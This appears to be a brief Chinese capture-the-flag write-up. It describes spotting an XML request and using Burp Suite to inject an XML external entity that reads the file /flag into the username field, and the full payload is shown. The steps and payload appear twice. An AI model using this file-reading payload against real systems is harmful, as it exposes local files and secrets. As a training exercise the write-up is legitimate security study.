1、输入2个参数,点击go
发现请求参数是xml格式
2、用burp suite构造请求参数,达成XEE
看到username取到了admin变量的内容
<!DOCTYPE root[<!ENTITY variable SYSTEM "file:///flag">]>
<!--声明 variable 实体-->
<username>&variable;</username>
<!--使用variable实体-->
发现请求参数是xml格式
看到username取到了admin变量的内容
<!DOCTYPE root[<!ENTITY variable SYSTEM "file:///flag">]>
<!--声明 variable 实体-->
<username>&variable;</username>
<!--使用variable实体-->